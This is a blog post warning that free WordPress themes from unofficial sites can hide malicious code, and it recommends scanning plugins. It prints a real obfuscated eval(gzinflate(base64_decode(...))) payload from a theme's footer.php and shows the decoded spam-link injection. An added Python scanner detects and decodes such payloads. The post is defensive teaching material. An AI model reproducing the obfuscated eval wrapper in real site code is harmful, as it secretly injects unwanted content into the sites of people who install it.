This warning pertains not only to WordPress but to all Content Management Systems (CMS) that use themes or templates, including Drupal, Joomla, and other popular Content Management Systems.

Everybody loves free things, but sometimes the wrong theme gives the user more than they bargained for: headaches.
That beautiful-looking theme could end up spawning spam bots, redirecting visitors to another site, or placing ads on your website without your permission.

When I refer to free themes, I am alluding to themes you find after performing a blind Google search for “free wordpress themes.”
If you really want to use free themes, you can find excellent ones in the WordPress Theme Directory.
Free themes from the WordPress Directory are wonderful: they are pre-inspected and certified for safe use.
To access these themes:

  • Inside your WordPress Dashboard, on the left menu, hover over Appearance.
  • In the menu that appears, click Themes.
  • On the Themes page, look in the upper left-hand corner for the Add New button and click it.
  • A grid of themes appears, which you can filter by the type of theme you are looking for.

Let me clarify something: not all free themes outside of the WordPress Directory are corrupt.
Some sites do provide legitimate and safe themes.
So you may ask, how can I be sure that a theme's code is clean?

First, install the theme on your site, but don't activate it.
Next, install Theme Authenticity Checker (TAC) from the WordPress Plugin Directory; it's free.
Once the plugin is activated, just follow the steps on the Themes page.

Side note: Some premium themes may display warnings when tested.
If you look at those warnings, they are not for malicious code.
The reason is that many of these themes were never intended to be added to the WordPress Theme Directory, so they were not written to pass the WordPress.org requirements or standards.

Another plugin that can check for malicious code is Sucuri Malware and Security Scanner.
This free plugin is also found in the WordPress Plugin Directory.

How about WP Antivirus Site Protection? Its description reads:
“This plugin will be especially useful for everybody who downloads WP themes and plugins from torrents and websites with free stuff instead of purchasing the original copies from the developers. You will be shocked how many free gifts they have inside.”

A very popular security plugin, Wordfence, is free and also found in the plugin directory. Its description reads:
“Scans core files, themes and plugins against WordPress.org repository versions to check their integrity. Verify security of your source.”

There are more, but the plugins listed above can get you started in protecting your website.

Checking Theme Files Manually
This process can be a bit tedious and is not for the faint of heart.
It is something a developer might take the time to pursue and investigate.
1) If a theme is red-flagged during a test, you may want to find out where the malicious code is located and how it was injected into the files.
2) Unzip the theme folder and open the theme files manually. The malicious code can normally be found in the following files:

  • footer.php
  • header.php
  • functions.php

Actually, unwanted code could be in other files, but normally I have found it in these three files.
Sample
Here is an actual sample of malicious code found in the footer.php file inside a free theme.
This theme was not from the WordPress Theme Directory.
footer.php file:

<?php eval(gzinflate(base64_decode("ZZHPTsMwDMbPnbR3sHJYNmm00naDND0AJ26UCyeUtW5TkTZV4tFN4oV4DZ6M/hnatMkX258/+Sc7kSKvviAzyvuYFdYSOibnsyAIboUPOhCTi8y2RxAKtMMiZhGTIml1Cztjy6op7JI3qka+eoBEikhJWMMT+qpsMIfdhVETtfdR1HVd6AmVIe2RqGpKH2a2ZkAVGYxZOmmQnkQmrzvDkjX8/oBIzhAwUUCPgZm2wIGHuSJc8vcJDb7hTWONkI9wl2j8As3sD3t3bJUz1g1c0edmu3XKk/IYaqoNly94qgeQEMTO9Qecz84XSgrEPHbeb5h8bshVODLD8jVNV7CA68l+TY0N+bvJ8ngqzx4R9b8Zv/SfDfEH"))); ?>

I have seen enough PHP code to recognize that this is not your normal footer.php file.
This is suspicious, concealed code; it was checked in VirusTotal, which did verify that it is malicious.

Results of the test: [VirusTotal scan result image not reproduced here]

So let's decode this code.
De-obfuscating it using UnPHP.net gives the decoded script shown below:

<?php ?><div class="footer">
<div class="footer_txt">© <a href="/"><?php bloginfo('name'); ?></a> , Designed by <a href="http://www.stealthsettings.com" title="Stealth Settings">Stealth Settings</a>,  <? bloginfo( 'name' ); echo ' '.date('Y'); ?> | Theme design by <a href="http://www.luxuryparlor.com/k233rastase.html">Kerastase</a>. <br>

<a href="/?feed=rss2">Entries</a> (RSS) &amp; <a href="/?feed=comments-rss2">Comments</a> (RSS)</div>
</div>

As you can see, strange ads are now posted in your footer, linked to foreign websites.
If you noticed, the Base64 encoding scheme (wrapped in gzinflate() compression, as the sample shows) is used to “hide” the actual malicious code
within the obfuscated code.
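To make the manual check above repeatable, here is an added Python example (not code from the original post) that walks an unzipped theme folder, flags eval()-wrapped base64_decode() and gzinflate(base64_decode()) payloads in every .php file, and reveals the hidden content by decoding it rather than executing it, which is what a tool like UnPHP does. The sample theme it builds, the injected footer link and the example.invalid URL are constructed test data, not taken from a real theme.

```python
import base64
import os
import re
import tempfile
import zlib

# Matches eval(base64_decode("...")) and eval(gzinflate(base64_decode("..."))), the wrapper in the footer.php sample.
PAYLOAD_RE = re.compile(
    r"eval\s*\(\s*(?P<inflate>gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"](?P<b64>[A-Za-z0-9+/=]+)['\"]\s*\)\s*\)?\s*\)",
    re.IGNORECASE,
)

def decode_payload(b64, inflate):
    """Reverse base64_decode() and, if present, gzinflate() without ever calling eval()."""
    raw = base64.b64decode(b64)
    if inflate:
        raw = zlib.decompress(raw, -zlib.MAX_WBITS)  # gzinflate() is raw DEFLATE (no zlib header)
    return raw.decode("utf-8", errors="replace")

def scan_file(path):
    """Return one finding (file, line, decoded payload) per eval() wrapper found in the file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    for m in PAYLOAD_RE.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        decoded = decode_payload(m.group("b64"), m.group("inflate") is not None)
        findings.append({"file": path, "line": line, "decoded": decoded})
    return findings

def scan_theme(theme_dir):
    findings = []  # walk the whole theme, not just footer.php, header.php and functions.php
    for root, _dirs, files in os.walk(theme_dir):
        for name in sorted(files):
            if name.endswith(".php"):
                findings.extend(scan_file(os.path.join(root, name)))
    return findings

def build_sample_theme():
    """Constructed sample: a clean header.php plus a footer.php using the post's eval/gzinflate wrapper."""
    hidden = b'<div class="footer">Designed by <a href="http://example.invalid/">Injected Link</a></div>'
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)  # raw DEFLATE, the input gzinflate() expects
    blob = base64.b64encode(comp.compress(hidden) + comp.flush()).decode("ascii")
    theme = tempfile.mkdtemp(prefix="theme-")
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write("<?php wp_head(); ?>\n")
    with open(os.path.join(theme, "footer.php"), "w") as fh:
        fh.write('<?php wp_footer(); ?>\n<?php eval(gzinflate(base64_decode("%s"))); ?>\n' % blob)
    return theme
```

Point scan_theme() at an unzipped theme folder; each finding gives the file, the line number and the decoded payload so you can read what the footer would have injected.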

I am not familiar with how this malicious code is initiated; one possible method is the eval() function.
Read more about: Eval
Caution
“The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.” (PHP.net)
More resources on Base64 code.

Conclusion:
“Precaution is better than cure.” Edward Coke
Enough said. Here are a few recommended sites to procure free and safe WordPress themes:
The best and safest source of free themes is the WordPress.org theme directory.
There are countless themes, something in every category, with more added daily.
For those who want to venture out of the box, here are a few sites you can check out:

As the old saying goes, “You get what you pay for.”
Sometimes it is actually a cost saving to pay a little for a theme that works without any frustrations down the road.

Hope this post sheds some light on free themes.
There are some good ones out there; it's just a matter of finding them.


Gerald Watanabe
Islandwebtek